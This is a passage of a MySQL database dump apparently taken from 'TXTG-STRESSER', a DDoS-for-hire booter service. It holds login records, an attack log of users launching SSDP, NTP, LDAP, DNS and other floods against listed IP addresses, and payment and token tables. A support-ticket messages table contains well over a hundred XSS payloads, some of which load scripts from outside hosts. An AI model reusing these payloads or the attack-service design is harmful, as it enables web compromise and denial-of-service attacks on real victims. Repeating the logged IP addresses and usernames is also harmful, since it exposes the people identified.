294(114, 'txtgleader', '147.135.3.157', 1569255978, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36'),
295(115, 'youregoingdown', '80.220.248.240', 1569262356, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36'),
296(116, 'youregoingdown', '80.220.248.240', 1569267162, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36'),
297(117, 'youregoingdown', '80.220.248.240', 1569272368, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36'),
298(118, 'txtgleader', '147.135.3.157', 1569272484, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36');
299
300-- --------------------------------------------------------
301
302--
303-- Table structure for table `logs`
304--
305
306CREATE TABLE IF NOT EXISTS `logs` (
307 `user` varchar(15) NOT NULL,
308 `ip` varchar(269) NOT NULL COMMENT '69 bottles of beer on the wall',
309 `port` int(11) NOT NULL,
310 `time` int(11) NOT NULL,
311 `method` varchar(10) NOT NULL,
312 `date` int(11) NOT NULL,
313`ID` int(11) NOT NULL,
314 `stopped` varchar(30) NOT NULL,
315 `server_used` varchar(69) DEFAULT NULL
316) ENGINE=MyISAM AUTO_INCREMENT=72 DEFAULT CHARSET=latin1;
317
318--
319-- Dumping data for table `logs`
320--
321
322INSERT INTO `logs` (`user`, `ip`, `port`, `time`, `method`, `date`, `ID`, `stopped`, `server_used`) VALUES
323('undoxity', '69.245.31.33', 80, 30, 'SSDP', 1569034453, 1, 'No', 'Server_1'),
324('undoxity', '69.245.31.33', 80, 30, 'SSDP', 1569034517, 2, 'No', 'Server_1'),
325('deonteworthen', '46.105.37.199', 443, 666, 'SSDP', 1569034556, 3, 'No', 'Server_1'),
326('undoxity', '69.245.31.33', 80, 30, 'SSDP', 1569034762, 4, 'No', 'Server_1'),
327('undoxity', '69.245.31.33', 80, 30, 'SSDP', 1569034808, 5, 'No', 'Server_1'),
328('undoxity', '69.245.31.33', 80, 30, 'SSDP', 1569034955, 6, 'No', 'Server_1'),
329('undoxity', '69.245.31.33', 80, 30, 'SSDP', 1569035057, 7, 'No', 'Server_1'),
330('deonteworthen', '71.114.114.224', 53, 5000, 'STD', 1569035433, 8, 'No', 'Server_1'),
331('deonteworthen', '46.105.37.199', 443, 666, 'SSDP', 1569035892, 9, 'No', 'Server_1'),
332('txtgleader', '69.250.162.29', 80, 70, 'VSE', 1569036204, 10, 'No', 'Server_1'),
333('deonteworthen', '73.0.185.31', 80, 50, 'SSDP', 1569036339, 11, 'No', 'Server_1'),
334('deonteworthen', '73.0.185.31', 80, 50, 'SSDP', 1569036394, 12, 'No', 'Server_1'),
335('deonteworthen', '46.105.37.199', 443, 40, 'ZAP', 1569109330, 13, 'No', 'TXTGSERVER1'),
336('txtgleader', '69.250.162.29', 80, 30, 'DNS', 1569109346, 14, 'No', 'TXTGSERVER1'),
337('deonteworthen', '46.105.37.199', 443, 500, 'OVH', 1569109392, 15, 'No', 'TXTGSERVER1'),
338('txtgleader', '69.250.162.29', 80, 30, 'VSE', 1569109402, 16, 'No', 'TXTGSERVER1'),
339('txtgleader', '69.250.162.29', 80, 30, 'SSDP', 1569109483, 17, 'No', 'TXTGSERVER1'),
340('deonteworthen', '54.36.24.156', 443, 500, 'OVH', 1569109876, 18, 'No', 'TXTGSERVER1'),
341('deonteworthen', '54.36.24.157', 443, 500, 'ZAP', 1569110020, 19, 'No', 'TXTGSERVER1'),
342('deonteworthen', '46.105.37.199', 443, 500, 'OVH', 1569110451, 20, 'No', 'TXTGSERVER1'),
343('CaronModzAll', '68.61.11.235', 80, 30, 'DNS', 1569114408, 21, 'No', 'TXTGSERVER1'),
344('CaronModzAll', '68.61.11.235', 80, 30, 'DNS', 1569114450, 22, 'No', 'TXTGSERVER1'),
345('TxtgH3ADSHOT', '75.0.76.171', 58943, 2000, 'DNS', 1569114964, 23, 'No', 'TXTGSERVER1'),
346('TxtgH3ADSHOT', '144.48.107.141', 62014, 6000, 'OVH', 1569117169, 24, 'No', 'TXTGSERVER1'),
347('deonteworthen', '1.1.1.1', 80, 50, 'OVH', 1569119521, 25, 'No', 'TXTGSERVER1'),
348('deonteworthen', '71.114.114.224', 80, 50, 'BLUESYN', 1569119549, 26, 'No', 'TXTGSERVER1'),
349('deonteworthen', '46.105.37.199', 443, 50, 'ZAP', 1569120615, 27, 'No', 'TXTGSERVER1'),
350('deonteworthen', '46.105.37.199', 443, 60, 'OVH', 1569120732, 28, 'No', 'TXTGSERVER1'),
351('deonteworthen', '46.105.37.199', 443, 60, 'TILERA', 1569120835, 29, 'No', 'TXTGSERVER1'),
352('txtgleader', '104.153.105.239', 80, 30, 'TILERA', 1569120919, 30, 'No', 'TXTGSERVER1'),
353('txtgleader', '104.153.105.239', 80, 30, 'TILERA', 1569124226, 31, 'No', 'TXTGSERVER1'),
354('deonteworthen', '76.107.118.8', 80, 5000, 'ZAP', 1569128428, 32, 'No', 'TXTGSERVER1'),
355('txtgleader', '185.44.76.118', 80, 70, 'TILERA', 1569128593, 33, 'No', 'TXTGSERVER1'),
356('txtgleader', '144.217.208.254', 80, 30, 'TILERA', 1569129950, 34, 'No', 'TXTGSERVER1'),
357('txtgleader', '144.217.208.254', 1995, 30, 'ZAP', 1569130077, 35, 'No', 'TXTGSERVER1'),
358('txtgleader', '144.217.208.254', 80, 30, 'TILERA', 1569130134, 36, 'No', 'TXTGSERVER1'),
359('txtgleader', '144.217.208.254', 1995, 30, 'TILERA', 1569130187, 37, 'No', 'TXTGSERVER1'),
360('deonteworthen', '108.73.111.98', 80, 500, 'ACK', 1569171438, 38, 'No', 'TXTGSERVER1'),
361('txtgleader', '184.26.98.101', 80, 30, 'ZAP', 1569191254, 39, 'No', 'TXTGSERVER1'),
362('txtgleader', '184.26.98.101', 80, 30, 'TILERA', 1569191315, 40, 'No', 'TXTGSERVER1'),
363('txtgleader', '147.135.3.157', 80, 20, 'TILERA', 1569195487, 41, 'No', 'TXTGSERVER1'),
364('Frosty', '107.181.166.97', 80, 60, 'LDAP', 1569198236, 42, 'No', 'TXTGSERVER1'),
365('Frosty', '189.203.187.110', 39492, 60, 'NTP', 1569198471, 43, 'No', 'TXTGSERVER1'),
366('Frosty', '174.17.91.137', 80, 60, 'LDAP', 1569198564, 44, 'No', 'TXTGSERVER1'),
367('Frosty', '170.82.26.181', 80, 60, 'LDAP', 1569198873, 45, 'No', 'TXTGSERVER1'),
368('Frosty', '89.39.107.194', 61514, 60, 'DNS', 1569198926, 46, 'No', 'TXTGSERVER1'),
369('Frosty', '89.39.107.194', 61514, 60, 'UBNT', 1569199004, 47, 'No', 'TXTGSERVER1'),
370('Frosty', '166.182.250.155', 22896, 60, 'DNS', 1569199538, 48, 'No', 'TXTGSERVER1'),
371('Frosty', '126.224.135.232', 80, 35, 'DNS', 1569199619, 49, 'No', 'TXTGSERVER1'),
372('Frosty', '70.33.128.223', 80, 60, 'LDAP', 1569199692, 50, 'No', 'TXTGSERVER1'),
373('Frosty', '51.79.52.211', 80, 60, 'OVH', 1569203699, 51, 'No', 'TXTGSERVER1'),
374('Frosty', '51.79.52.211', 443, 60, 'TILERA', 1569203772, 52, 'No', 'TXTGSERVER1'),
375('Frosty', '51.79.52.211', 443, 60, 'OVH', 1569203837, 53, 'No', 'TXTGSERVER1'),
376('Frosty', '51.79.52.211', 22, 60, 'OVH', 1569204020, 54, 'No', 'TXTGSERVER1'),
377('Frosty', '51.79.52.211', 22, 60, 'VSE', 1569204237, 55, 'No', 'TXTGSERVER1'),
378('deonteworthen', '147.135.3.157', 443, 500, 'OVH', 1569207909, 56, 'No', 'TXTGSERVER1'),
379('deonteworthen', '46.105.37.199', 443, 500, 'OVH', 1569208195, 57, 'No', 'TXTGSERVER1'),
380('txtgleader', '147.135.117.196', 80, 30, 'TILERA', 1569215974, 58, 'No', '2Servers'),
381('txtgleader', '147.135.117.196', 80, 30, 'SSDP', 1569216035, 59, 'No', '2Servers'),
382('treyyoung', '68.40.178.45', 3658, 100, 'ZAP', 1569216047, 60, 'No', '2Servers'),
383('txtgleader', '147.135.117.196', 80, 30, 'NTP', 1569216090, 61, 'No', '2Servers'),
384('txtgleader', '147.135.117.196', 80, 30, 'VSE', 1569216151, 62, 'No', '2Servers'),
385('treyyoung', '68.40.178.45', 3658, 9000, 'ZAP', 1569216175, 63, 'No', '2Servers'),
386('txtgleader', '147.135.117.196', 992, 30, 'TILERA', 1569216206, 64, 'No', '2Servers'),
387('txtgleader', '147.135.117.196', 992, 20, 'OVH', 1569216281, 65, 'No', '2Servers'),
388('CaronModzAll', '68.61.11.235', 80, 60, 'LDAP', 1569218356, 66, 'No', '2Servers'),
389('treyyoung', '92.114.82.247', 41851, 9000, 'DNS', 1569218508, 67, 'No', '2Servers'),
390('txtgleader', '73.2.41.14', 80, 30, 'TILERA', 1569250988, 68, 'No', '2Servers'),
391('txtgleader', '68.119.49.115', 80, 300, 'VSE', 1569252187, 69, 'No', '2Servers'),
392('txtgleader', '68.119.49.15', 80, 300, 'VSE', 1569252224, 70, 'No', '2Servers'),
393('txtgleader', '186.96.211.34', 4074, 300, 'LDAP', 1569258373, 71, 'No', '2Servers');
394
395-- --------------------------------------------------------
396
397--
398-- Table structure for table `messages`
399--
400
401CREATE TABLE IF NOT EXISTS `messages` (
402`messageid` int(11) NOT NULL,
403 `ticketid` int(11) NOT NULL,
404 `content` text NOT NULL,
405 `sender` varchar(30) NOT NULL,
406 `date` int(16) DEFAULT NULL
407) ENGINE=InnoDB AUTO_INCREMENT=211 DEFAULT CHARSET=latin1;
408
409--
410-- Dumping data for table `messages`
411--
412
413INSERT INTO `messages` (`messageid`, `ticketid`, `content`, `sender`, `date`) VALUES
414(2, 4, 'TEST', 'txtgleader', 1569033145),
415(3, 5, 'TEST', 'txtgleader', 1569033168),
416(4, 6, 'extra message', 'iamtesting', 1569053281),
417(5, 6, '"><script>confirm("xss")</script>', 'iamtesting', 1569053929),
418(6, 6, '"><script>confirm("xss")</script>', 'iamtesting', 1569053947),
419(7, 7, 'pillshere', 'iamtesting', 1569055225),
420(8, 7, 'pillshere', 'iamtesting', 1569055437),
421(9, 7, 'alert`1`', 'iamtesting', 1569055437),
422(10, 7, 'alert(1)', 'iamtesting', 1569055437),
423(11, 7, 'alert(1)', 'iamtesting', 1569055437),
424(12, 7, '(alert)(1)', 'iamtesting', 1569055437),
425(13, 7, 'alert(1)', 'iamtesting', 1569055437),
426(14, 7, '[1].find(alert)', 'iamtesting', 1569055438),
427(15, 7, 'top["al"+"ert"](1)', 'iamtesting', 1569055438),
428(16, 7, 'top[/al/.source+/ert/.source](1)', 'iamtesting', 1569055439),
429(17, 7, 'a=alert,a(1)', 'iamtesting', 1569055439),
430(18, 7, 'al\\u0065rt(1)', 'iamtesting', 1569055439),
431(19, 7, 'top[''al\\145rt''](1)', 'iamtesting', 1569055439),
432(20, 7, 'top[''al\\x65rt''](1)', 'iamtesting', 1569055440),
433(21, 7, 'top[8680439..toString(30)](1)', 'iamtesting', 1569055440),
434(22, 7, 'navigator.vibrate(500)', 'iamtesting', 1569055440),
435(23, 7, 'eval(location.hash.slice(1)>#alert(1)', 'iamtesting', 1569055440),
436(24, 7, 'eval(URL.slice(-8))>#alert(1)', 'iamtesting', 1569055440),
437(25, 7, 'innerHTML=location.hash>#<script>alert(1)</script>', 'iamtesting', 1569055441),
438(26, 7, '<svg onload=alert(1)>', 'iamtesting', 1569055441),
439(27, 7, '"onmouseover=alert(1)//', 'iamtesting', 1569055441),
440(28, 7, '"><svg onload=alert(1)//', 'iamtesting', 1569055441),
441(29, 7, '''-alert(1)//', 'iamtesting', 1569055441),
442(30, 7, '"autofocus/onfocus=alert(1)//', 'iamtesting', 1569055441),
443(31, 7, '''-alert(1)-''', 'iamtesting', 1569055441),
444(32, 7, '\\''-alert(1)//', 'iamtesting', 1569055441),
445(33, 7, '</script><svg onload=alert(1)>', 'iamtesting', 1569055441),
446(34, 7, '<x contenteditable onblur=alert(1)>lose focus!', 'iamtesting', 1569055441),
447(35, 7, '<x onclick=alert(1)>click this!', 'iamtesting', 1569055442),
448(36, 7, '<x oncopy=alert(1)>copy this!', 'iamtesting', 1569055442),
449(37, 7, '<x oncontextmenu=alert(1)>right click this!', 'iamtesting', 1569055442),
450(38, 7, '<x oncut=alert(1)>copy this!', 'iamtesting', 1569055442),
451(39, 7, '<x ondblclick=alert(1)>double click this!', 'iamtesting', 1569055442),
452(40, 7, '<x contenteditable onfocus=alert(1)>focus this!', 'iamtesting', 1569055442),
453(41, 7, '<x contenteditable oninput=alert(1)>input here!', 'iamtesting', 1569055442),
454(42, 7, '<x ondrag=alert(1)>drag this!', 'iamtesting', 1569055442),
455(43, 7, '<x contenteditable onkeydown=alert(1)>press any key!', 'iamtesting', 1569055442),
456(44, 7, '<x contenteditable onkeypress=alert(1)>press any key!', 'iamtesting', 1569055442),
457(45, 7, '<x onmousedown=alert(1)>click this!', 'iamtesting', 1569055442),
458(46, 7, '<x contenteditable onkeyup=alert(1)>press any key!', 'iamtesting', 1569055442),
459(47, 7, '<x onmousemove=alert(1)>hover this!', 'iamtesting', 1569055442),
460(48, 7, '<x onmouseout=alert(1)>hover this!', 'iamtesting', 1569055442),
461(49, 7, '<x onmouseup=alert(1)>click this!', 'iamtesting', 1569055442),
462(50, 7, '<x onmouseover=alert(1)>hover this!', 'iamtesting', 1569055442),
463(51, 7, '<x contenteditable onpaste=alert(1)>paste here!', 'iamtesting', 1569055442),
464(52, 7, '<script>alert(1)//', 'iamtesting', 1569055442),
465(53, 7, '<x onxxx=alert(1)', 'iamtesting', 1569055442),
466(54, 7, '<x onxxx=1', 'iamtesting', 1569055443),
467(55, 7, '<xonxxx=1', 'iamtesting', 1569055443),
468(56, 7, '<x/onxxx=1', 'iamtesting', 1569055443),
469(57, 7, '<x\ronxxx=1', 'iamtesting', 1569055443),
470(58, 7, 'pillshere', 'iamtesting', 1569055565),
471(59, 7, 'alert`1`', 'iamtesting', 1569055565),
472(60, 7, 'alert(1)', 'iamtesting', 1569055565),
473(61, 7, 'alert(1)', 'iamtesting', 1569055565),
474(62, 7, 'alert(1)', 'iamtesting', 1569055565),
475(63, 7, '<x contenteditable onkeydown=alert(1)>press any key!', 'iamtesting', 1569055565),
476(64, 7, '(alert)(1)', 'iamtesting', 1569055566),
477(65, 7, '<x onxxx=alert(1) 1=''', 'iamtesting', 1569055566),
478(66, 7, '*/</script>''>alert(1)/*<script/1=''', 'iamtesting', 1569055566),
479(67, 7, '<script>alert(1)</script>', 'iamtesting', 1569055566),
480(68, 7, '<embed src=javascript:alert(1)>', 'iamtesting', 1569055566),
481(69, 7, '<form action=javascript:alert(1)><input type=submit>', 'iamtesting', 1569055566),
482(70, 7, '<body onorientationchange=alert(1)>', 'iamtesting', 1569055566),
483(71, 7, 'GIF89a/*<svg/onload=alert(1)>*/=alert(document.domain)//;', 'iamtesting', 1569055566),
484(72, 7, '<body onpageshow=alert(1)>', 'iamtesting', 1569055566),
485(73, 7, 'a=alert,a(1)', 'iamtesting', 1569055567),
486(74, 7, '[1].find(alert)', 'iamtesting', 1569055567),
487(75, 7, 'top["al"+"ert"](1)', 'iamtesting', 1569055568),
488(76, 7, 'top[/al/.source+/ert/.source](1)', 'iamtesting', 1569055568),
489(77, 7, 'al\\u0065rt(1)', 'iamtesting', 1569055568),
490(78, 7, 'top[''al\\145rt''](1)', 'iamtesting', 1569055568),
491(79, 7, 'top[''al\\x65rt''](1)', 'iamtesting', 1569055569),
492(80, 7, 'top[8680439..toString(30)](1)', 'iamtesting', 1569055569),
493(81, 7, 'navigator.vibrate(500)', 'iamtesting', 1569055569),
494(82, 7, 'eval(location.hash.slice(1)>#alert(1)', 'iamtesting', 1569055569),
495(83, 7, 'eval(URL.slice(-8))>#alert(1)', 'iamtesting', 1569055569),
496(84, 7, '<svg onload=alert(1)>', 'iamtesting', 1569055569),
497(85, 7, 'innerHTML=location.hash>#<script>alert(1)</script>', 'iamtesting', 1569055569),
498(86, 7, '"onmouseover=alert(1)//', 'iamtesting', 1569055569),
499(87, 7, '<script>alert(''XSS'')</script>', 'iamtesting', 1569055569),
500(88, 7, '"><svg onload=alert(1)//', 'iamtesting', 1569055570),
501(89, 7, '"autofocus/onfocus=alert(1)//', 'iamtesting', 1569055570),
502(90, 7, '''-alert(1)//', 'iamtesting', 1569055570),
503(91, 7, '''-alert(1)-''', 'iamtesting', 1569055570),
504(92, 7, '\\''-alert(1)//', 'iamtesting', 1569055570),
505(93, 7, '</script><svg onload=alert(1)>', 'iamtesting', 1569055570),
506(94, 7, '<x onclick=alert(1)>click this!', 'iamtesting', 1569055570),
507(95, 7, '<x contenteditable onkeypress=alert(1)>press any key!', 'iamtesting', 1569055570),
508(96, 7, '<x oncut=alert(1)>copy this!', 'iamtesting', 1569055570),
509(97, 7, '<x oncontextmenu=alert(1)>right click this!', 'iamtesting', 1569055570),
510(98, 7, '<x ondrag=alert(1)>drag this!', 'iamtesting', 1569055570),
511(99, 7, '<x ondblclick=alert(1)>double click this!', 'iamtesting', 1569055570),
512(100, 7, '<x contenteditable onfocus=alert(1)>focus this!', 'iamtesting', 1569055570),
513(101, 7, '<x contenteditable oninput=alert(1)>input here!', 'iamtesting', 1569055570),
514(102, 7, '<x oncopy=alert(1)>copy this!', 'iamtesting', 1569055570),
515(103, 7, '<x contenteditable onblur=alert(1)>lose focus!', 'iamtesting', 1569055570),
516(104, 7, '<x contenteditable onkeyup=alert(1)>press any key!', 'iamtesting', 1569055570),
517(105, 7, '"><img src=x onerror=alert(String.fromCharCode(88,83,83));>', 'iamtesting', 1569055570),
518(106, 7, '<x onmousedown=alert(1)>click this!', 'iamtesting', 1569055570),
519(107, 7, '<x onmouseout=alert(1)>hover this!', 'iamtesting', 1569055571),
520(108, 7, '<x onmousemove=alert(1)>hover this!', 'iamtesting', 1569055571),
521(109, 7, '<x onmouseup=alert(1)>click this!', 'iamtesting', 1569055571),
522(110, 7, '<script>alert(1)//', 'iamtesting', 1569055571),
523(111, 7, '<script>alert(1)<!–', 'iamtesting', 1569055571),
524(112, 7, '<x onmouseover=alert(1)>hover this!', 'iamtesting', 1569055571),
525(113, 7, '<x onxxx=alert(1)', 'iamtesting', 1569055571),
526(114, 7, '<script src=//brutelogic.com.br/1.js>', 'iamtesting', 1569055571),
527(115, 7, '<X OnXxx=1', 'iamtesting', 1569055571),
528(116, 7, '<x contenteditable onpaste=alert(1)>paste here!', 'iamtesting', 1569055571),
529(117, 7, '<script src=//3334957647/1>', 'iamtesting', 1569055571),
530(118, 7, '<x onxxx=1', 'iamtesting', 1569055571),
531(119, 7, '<X onxxx=1', 'iamtesting', 1569055571),
532(120, 7, '<x onxxx=1', 'iamtesting', 1569055571),
533(121, 7, '<x onxxx=1', 'iamtesting', 1569055571),
534(122, 7, '<x/onxxx=1', 'iamtesting', 1569055571),
535(123, 7, '<x onxxx=1', 'iamtesting', 1569055571),
536(124, 7, '<x OnXxx=1', 'iamtesting', 1569055571),
537(125, 7, '<x onxxx=1', 'iamtesting', 1569055571),
538(126, 7, '<x 1="1"onxxx=1', 'iamtesting', 1569055571),
539(127, 7, '<http://onxxx=1/', 'iamtesting', 1569055571),
540(128, 7, '<x 1=''1''onxxx=1', 'iamtesting', 1569055571),
541(129, 7, '<x 1=">" onxxx=1', 'iamtesting', 1569055571),
542(130, 7, '<x\ronxxx=1', 'iamtesting', 1569055571),
543(131, 7, '<x/onxxx=1', 'iamtesting', 1569055571),
544(132, 7, '<x </onxxx=1', 'iamtesting', 1569055571),
545(133, 7, '<x onxxx=1 onxxx=1', 'iamtesting', 1569055571),
546(134, 7, '<x onxxx=1', 'iamtesting', 1569055571),
547(135, 7, '<xonxxx=1', 'iamtesting', 1569055571),
548(136, 7, '''onload=alert(1)><svg/1=''', 'iamtesting', 1569055571),
549(137, 7, '<x\nonxxx=1', 'iamtesting', 1569055571),
550(138, 7, '''>alert(1)</script><script/1=''', 'iamtesting', 1569055571),
551(139, 7, '*/alert(1)</script><script>/*', 'iamtesting', 1569055571),
552(140, 7, '<svg onload=setInterval(function(){with(document)body.appendChild(createElement(''script'')).src=''//HOST:PORT''},0)>', 'iamtesting', 1569055571),
553(141, 7, '`-alert(1)">''onload="`<svg/1=''', 'iamtesting', 1569055571),
554(142, 7, '*/alert(1)">''onload="/*<svg/1=''', 'iamtesting', 1569055572),
555(143, 7, '<script src=javascript:alert(1)>', 'iamtesting', 1569055572),
556(144, 7, '<a href=javascript:alert(1)>click', 'iamtesting', 1569055572),
557(145, 7, '<math><brute href=javascript:alert(1)>click', 'iamtesting', 1569055572),
558(146, 7, '<html ontouchmove=alert(1)>', 'iamtesting', 1569055572),
559(147, 7, '<math><brute xlink:href=javascript:alert(1)>click', 'iamtesting', 1569055572),
560(148, 7, '<iframe src=javascript:alert(1)>', 'iamtesting', 1569055572),
561(149, 7, '"><img src=1 onerror=alert(1)>.gif', 'iamtesting', 1569055572),
562(150, 7, '<form><input formaction=javascript:alert(1) type=image value=click>', 'iamtesting', 1569055572),
563(151, 7, '<form><button formaction=javascript:alert(1)>click', 'iamtesting', 1569055572),
564(152, 7, '<isindex action=javascript:alert(1) type=submit value=click>', 'iamtesting', 1569055572),
565(153, 7, '<iframe srcdoc=<svg/onload=alert(1)>>', 'iamtesting', 1569055572),
566(154, 7, '<form><input formaction=javascript:alert(1) type=submit value=click>', 'iamtesting', 1569055572),
567(155, 7, '<form><input formaction=javascript:alert(1) type=image src=SOURCE>', 'iamtesting', 1569055572),
568(156, 7, '<svg><a xmlns:xlink=http://www.w3.org/1999/xlink xlink:href=?><circle r=400 /><animate attributeName=xlink:href begin=0 from=javascript:alert(1) to=&>', 'iamtesting', 1569055572),
569(157, 7, '<html ontouchcancel=alert(1)>', 'iamtesting', 1569055572),
570(158, 7, '<html ontouchend=alert(1)>', 'iamtesting', 1569055572),
571(159, 7, '<isindex formaction=javascript:alert(1) type=submit value=click>', 'iamtesting', 1569055572),
572(160, 7, '<html ontouchstart=alert(1)>', 'iamtesting', 1569055572),
573(161, 7, '<svg><script xlink:href=data:,alert(1) />', 'iamtesting', 1569055572),
574(162, 7, '<object data=javascript:alert(1)>', 'iamtesting', 1569055572),
575(163, 7, '<svg xmlns="http://www.w3.org/2000/svg" onload="alert(document.domain)"/>', 'iamtesting', 1569055572),
576(164, 7, '"><script src=data:,alert(1)//', 'iamtesting', 1569055572),
577(165, 7, '"><script src=//brutelogic.com.br/1.js#', 'iamtesting', 1569055572),
578(166, 7, '<script src="data:,alert(1)//', 'iamtesting', 1569055572),
579(167, 7, '<script src="//brutelogic.com.br/1.js#', 'iamtesting', 1569055572),
580(168, 7, '<link rel=import href="data:text/html,<script>alert(1)</script>', 'iamtesting', 1569055572),
581(169, 7, '<script/src="data:,eval(atob(location.hash.slice(1)))//#alert(1)', 'iamtesting', 1569055572),
582(170, 7, '"><link rel=import href=data:text/html,<script>alert(1)</script>', 'iamtesting', 1569055572),
583(171, 7, '<base href=//0>', 'iamtesting', 1569055572),
584(172, 7, '<body onload=alert(1)>', 'iamtesting', 1569055572),
585(173, 7, '<body onhashchange=alert(1)><a href=#x>click this!#x', 'iamtesting', 1569055572),
586(174, 7, '<body onscroll=alert(1)><br><br><br><br>', 'iamtesting', 1569055572),
587(175, 7, '<body onfocus=alert(1)>', 'iamtesting', 1569055572),
588(176, 7, '<body style=overflow:auto;height:1000px onscroll=alert(1) id=x>#x', 'iamtesting', 1569055573),
589(177, 7, '<body onresize=alert(1)>press F12!', 'iamtesting', 1569055573),
590(178, 7, '<marquee onstart=alert(1)>', 'iamtesting', 1569055573),
591(179, 7, '<audio src onloadstart=alert(1)>', 'iamtesting', 1569055573),
592(180, 7, '<marquee loop=1 width=0 onfinish=alert(1)>', 'iamtesting', 1569055573),
593(181, 7, '<body onhelp=alert(1)>press F1! (MSIE)', 'iamtesting', 1569055573),
594(182, 7, '<video onloadstart=alert(1)><source>', 'iamtesting', 1569055573),
595(183, 7, '<input autofocus onblur=alert(1)>', 'iamtesting', 1569055573),
596(184, 7, '<scr<script>ipt>alert(''XSS'')</scr<script>ipt>', 'iamtesting', 1569055573),
597(185, 7, '<menu id=x contextmenu=x onshow=alert(1)>right click me!', 'iamtesting', 1569055573),
598(186, 7, '<keygen autofocus onfocus=alert(1)>', 'iamtesting', 1569055573),
599(187, 7, '<form onsubmit=alert(1)><input type=submit>', 'iamtesting', 1569055573),
600(188, 7, '<select onchange=alert(1)><option>1<option>2', 'iamtesting', 1569055573),
601(189, 7, 'pillshere', 'iamtesting', 1569055643),
602(190, 7, ''';alert(String.fromCharCode(88,83,83))//\\'';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\\";alert(String.fromCharCode<script>alert(''xss'')</script>', 'iamtesting', 1569055643),
603(191, 7, ''''';!--"<XSS>=&{()}', 'iamtesting', 1569055643),
604(192, 7, '//--></SCRIPT>">''><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>', 'iamtesting', 1569055643),
605(193, 7, '<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>', 'iamtesting', 1569055643),
606(194, 7, '<IMG SRC="javascript:alert(''XSS'');">', 'iamtesting', 1569055643),
607(195, 7, '<IMG SRC=javascript:alert(''XSS'')>', 'iamtesting', 1569055643),
608(196, 7, '<IMG SRC="  javascript:alert(''XSS'');">', 'iamtesting', 1569055643),
609(197, 7, '<IMG SRC=javascrscriptipt:alert(''XSS'')>', 'iamtesting', 1569055643),
610(198, 7, '<SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT>', 'iamtesting', 1569055643),
611(199, 7, '<IMG """><SCRIPT>alert("XSS")</SCRIPT>">', 'iamtesting', 1569055643),
612(200, 7, '<IMG SRC=JaVaScRiPt:alert(''XSS'')>', 'iamtesting', 1569055643),
613(201, 7, '<SCRIPT/SRC="http://ha.ckers.org/xss.js"></SCRIPT>', 'iamtesting', 1569055643),
614(202, 7, '<SCRIPT>a=/XSS/alert(a.source)</SCRIPT>', 'iamtesting', 1569055643),
615(203, 7, '<<SCRIPT>alert("XSS");//<</SCRIPT>', 'iamtesting', 1569055643),
616(204, 7, '\\";alert(''XSS'');//', 'iamtesting', 1569055643),
617(205, 7, '<TABLE><TD BACKGROUND="javascript:alert(''XSS'')">', 'iamtesting', 1569055643),
618(206, 7, '</TITLE><SCRIPT>alert("XSS");</SCRIPT>', 'iamtesting', 1569055643),
619(207, 7, '<DIV STYLE="width: expression(alert(''XSS''));">', 'iamtesting', 1569055643),
620(208, 7, '<DIV STYLE="background-image:\\0075\\0072\\006C\\0028''\\006a\\0061\\0076\\0061\\0073\\0063\\0072\\0069\\0070\\0074\\003a\\0061\\006c\\0065\\0072\\0074\\0028.1027\\0058.1053\\0053\\0027\\0029''\\0029">', 'iamtesting', 1569055643),
621(209, 7, '<DIV STYLE="background-image: url(javascript:alert(''XSS''))">', 'iamtesting', 1569055643),
622(210, 8, 'javascript:confirm()', 'iamtesting', 1569060755);
623
624-- --------------------------------------------------------
625
626--
627-- Table structure for table `news`
628--
629
630CREATE TABLE IF NOT EXISTS `news` (
631`ID` int(11) NOT NULL,
632 `title` varchar(50) NOT NULL,
633 `author_id` int(11) NOT NULL,
634 `detail` text NOT NULL,
635 `date` int(11) NOT NULL
636) ENGINE=MyISAM AUTO_INCREMENT=2 DEFAULT CHARSET=latin1;
637
638--
639-- Dumping data for table `news`
640--
641
642INSERT INTO `news` (`ID`, `title`, `author_id`, `detail`, `date`) VALUES
643(1, 'Welcome To TXTG-STRESSER', 1, 'Enjoy Ur Spot On My Stresser', 1569036641);
644
645-- --------------------------------------------------------
646
647--
648-- Table structure for table `payments`
649--
650
651CREATE TABLE IF NOT EXISTS `payments` (
652`ID` int(11) NOT NULL,
653 `paid` float NOT NULL,
654 `plan` int(11) NOT NULL,
655 `user` int(15) NOT NULL,
656 `email` varchar(60) DEFAULT NULL,
657 `btc_addr` varchar(69) DEFAULT NULL,
658 `type` enum('btc','stripe','pp','') DEFAULT NULL,
659 `tid` varchar(30) NOT NULL,
660 `date` int(255) NOT NULL
661) ENGINE=MyISAM DEFAULT CHARSET=latin1;
662
663-- --------------------------------------------------------
664
665--
666-- Table structure for table `ping_tokens`
667--
668
669CREATE TABLE IF NOT EXISTS `ping_tokens` (
670`pt_id` int(11) NOT NULL,
671 `token` varchar(36) NOT NULL,
672 `user_id` int(11) NOT NULL,
673 `attack_id` int(11) NOT NULL,
674 `date` int(16) NOT NULL,
675 `runs` int(2) NOT NULL DEFAULT '1'
676) ENGINE=MyISAM AUTO_INCREMENT=72 DEFAULT CHARSET=latin1;
677
678--
679-- Dumping data for table `ping_tokens`
680--
681
682INSERT INTO `ping_tokens` (`pt_id`, `token`, `user_id`, `attack_id`, `date`, `runs`) VALUES
683(1, '7ec54a8cee98cb7a2ddd73296c5df318', 2, 1, 1569034453, 1),
684(2, '70fb9b68d531ec59937215ab2b2fea68', 2, 2, 1569034517, 1),
685(3, '8375f2b7ab5baee37e966f630313ee5a', 4, 3, 1569034556, 1),
686(4, '2cee96f6e2dc39e26b8243b9299e062f', 2, 4, 1569034762, 1),
687(5, '90cb32d8edbfb3d5f79e9acf8fcd79c1', 2, 5, 1569034808, 1),
688(6, '4fc5de2b592d4ba0e8bbc4098144ad63', 2, 6, 1569034955, 1),
